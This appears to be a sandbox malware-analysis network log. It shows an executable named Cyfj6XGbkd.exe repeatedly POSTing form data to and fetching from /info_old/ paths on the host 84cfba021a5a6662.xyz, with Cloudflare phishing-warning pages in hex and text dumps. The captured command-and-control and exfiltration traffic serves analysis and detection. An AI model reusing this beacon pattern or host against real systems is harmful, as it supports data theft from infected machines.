                                                                                                                                                    Set-Cookie: __cfduid=dfd1543d618807c76cb51baef504b58491611938209; expires=Sun, 28-Feb-21 16:36:49 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    cf-request-id: 07f09a360d0000c7713abc2000000001
                                                                                                                                                    Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=kDBDa3O4gcjQHx7SddhRGwqhUKmFKuFOCZV61Ca41y3J0daL4CBfi4qULaTcPjYCuwV2Y0FH1mkanoF7BwVd4f1yEU6ywTAC872iBXOU5fJcKuDluw%3D%3D"}],"group":"cf-nel"}
                                                                                                                                                    NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 61945fd01c9bc771-AMS
                                                                                                                                                     Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74
                                                                                                                                                    Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" cont


                                                                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                                     2 | 192.168.2.6 | 49730 | 104.21.23.16 | 80 | C:\Users\user\Desktop\Cyfj6XGbkd.exe
                                                                                                                                                     Timestamp | kBytes transferred | Direction | Data
                                                                                                                                                     Jan 29, 2021 17:36:46.738434076 CET | 175 | OUT | POST /info_old/w HTTP/1.1
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                    upgrade-insecure-requests: 1
                                                                                                                                                    Content-Length: 81
                                                                                                                                                    Host: 84cfba021a5a6662.xyz
                                                                                                                                                     Jan 29, 2021 17:36:46.807162046 CET | 176 | IN | HTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 29 Jan 2021 16:36:46 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Set-Cookie: __cfduid=d44c674e9b268f9729bc63b270c11e6fb1611938206; expires=Sun, 28-Feb-21 16:36:46 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    cf-request-id: 07f09a2c360000fa887a3a9000000001
                                                                                                                                                    Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=bgeVqZANOyLARbubF49VtUP%2BZDvlFHU2EXWwvnYQLx41IuECCf6Iv3nEhozobRthbuUQtu8HTzOt4czKuTC7xmyu3fCffsHgriO5TJhL669K9MECjQ%3D%3D"}]}
                                                                                                                                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 61945fc05ce6fa88-AMS
                                                                                                                                                     Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f
Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" co
Jan 29, 2021 17:36:55.304384947 CET  187  OUT  POST /info_old/e HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
upgrade-insecure-requests: 1
Content-Length: 677
Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:36:55.358536005 CET  190  IN  HTTP/1.1 200 OK
Date: Fri, 29 Jan 2021 16:36:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=debc2c1474dd88953f1663041caeface91611938215; expires=Sun, 28-Feb-21 16:36:55 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
X-Frame-Options: SAMEORIGIN
cf-request-id: 07f09a4daf0000fa8808379000000001
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=DszwcFU1azWQLn01RElxOwnV2O2Ueli9QIC2IbMyKMQVDlZD5IjdcVbfh5UvCbSQdvehZMIYHKVW8KDBGHU1n7v6nJ75mb0b7%2Bh73mH%2B0VSgQPaReA%3D%3D"}]}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 61945ff5ecddfa88-AMS
Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport"
Jan 29, 2021 17:36:55.381866932 CET  194  OUT  POST /info_old/w HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
upgrade-insecure-requests: 1
Content-Length: 81
Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:36:55.432903051 CET  196  IN  HTTP/1.1 200 OK
Date: Fri, 29 Jan 2021 16:36:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=debc2c1474dd88953f1663041caeface91611938215; expires=Sun, 28-Feb-21 16:36:55 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
X-Frame-Options: SAMEORIGIN
cf-request-id: 07f09a4dfa0000fa8830063000000001
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=D9fwJOS8pZebGFQq7B6FJLaQ%2FmcNDipyadybgDD7L1SKN97VSbKQsHKdxwBNnl3D2%2FOx1sH34jEiZYb1VtlFnHKk09yuid%2F54wWWzO9I6f6a3y5cJQ%3D%3D"}]}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 61945ff65de5fa88-AMS
Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport
Jan 29, 2021 17:36:56.186005116 CET  223  OUT  POST /info_old/g HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
upgrade-insecure-requests: 1
Content-Length: 1393
Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:36:56.243818045 CET  225  IN  HTTP/1.1 200 OK
Date: Fri, 29 Jan 2021 16:36:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d32f2108bb076b21c1c63ae0d28e80c8e1611938216; expires=Sun, 28-Feb-21 16:36:56 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
X-Frame-Options: SAMEORIGIN
cf-request-id: 07f09a51220000fa880fab6000000001
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=4cBjVt6maK1fuMMQwP2NLxcTyTXIs04jwjJLktsaBAHCzMfSBk5sXhUCUfo1tWttLn99vsmrv4c3y411195%2BQM9Kt0D3ZN8BEjIGDpMtuLMG3f%2BpWg%3D%3D"}]}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 61945ffb6a69fa88-AMS
Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport"
Jan 29, 2021 17:36:56.298440933 CET  230  OUT  POST /info_old/w HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
upgrade-insecure-requests: 1
Content-Length: 81
Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:36:56.357669115 CET  231  IN  HTTP/1.1 200 OK
Date: Fri, 29 Jan 2021 16:36:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d32f2108bb076b21c1c63ae0d28e80c8e1611938216; expires=Sun, 28-Feb-21 16:36:56 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
X-Frame-Options: SAMEORIGIN
cf-request-id: 07f09a51900000fa8854a82000000001
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=vEXjgAcCWfJcyMvkOYR6nKRhmvxrpnQ9If4uVJkHoTC%2BmHUhl3TvkTuOyvHTcR3VHcQHxuwGIbIsHFsPo39NKLWzrt1TdOP5Xspnnfrx95e0%2BZOKcA%3D%3D"}]}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 61945ffc1c10fa88-AMS
                                                                                                                                                    Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport"
                                                                                                                                                    Jan 29, 2021 17:36:56.360771894 CET236OUTGET /info_old/r HTTP/1.1
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                    upgrade-insecure-requests: 1
                                                                                                                                                    Host: 84cfba021a5a6662.xyz
                                                                                                                                                     Jan 29, 2021 17:36:56.421464920 CET | 237 kB | IN | HTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 29 Jan 2021 16:36:56 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Set-Cookie: __cfduid=d32f2108bb076b21c1c63ae0d28e80c8e1611938216; expires=Sun, 28-Feb-21 16:36:56 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    cf-request-id: 07f09a51d00000fa881c8c6000000001
                                                                                                                                                    Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=2R%2F90jP2adhrJ1reGaFc1uVWg0BTxfIBXZsYWbtqsmfadTi2Wy%2FxqhIGyogEoPocOCreTgk%2BamVP09M9vOnBLLLcfzZaC3rdbKVDP0I9AO%2Bdkcw30w%3D%3D"}]}
                                                                                                                                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 61945ffc7cf6fa88-AMS
                                                                                                                                                    Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f
                                                                                                                                                    Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewpo
                                                                                                                                                     Jan 29, 2021 17:36:58.555171967 CET | 242 kB | OUT | POST /info_old/w HTTP/1.1
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                    upgrade-insecure-requests: 1
                                                                                                                                                    Content-Length: 81
                                                                                                                                                    Host: 84cfba021a5a6662.xyz
                                                                                                                                                     Jan 29, 2021 17:36:58.605498075 CET | 243 kB | IN | HTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 29 Jan 2021 16:36:58 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Set-Cookie: __cfduid=d603c7de3c048bd21973481136751b3721611938218; expires=Sun, 28-Feb-21 16:36:58 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    cf-request-id: 07f09a5a5f0000fa881330c000000001
                                                                                                                                                    Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=NJAqAO4yJWPuTq9evI1AWyMeynWnmxEMn3et8pb%2FIRWAHDRDQDU542KBRo8FHOiPxwUweybLvunWWx5kRs55wa40ZiQgHguurv9cq%2BH%2BRXDGjR9gjw%3D%3D"}]}
                                                                                                                                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 6194600a3d73fa88-AMS
                                                                                                                                                    Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 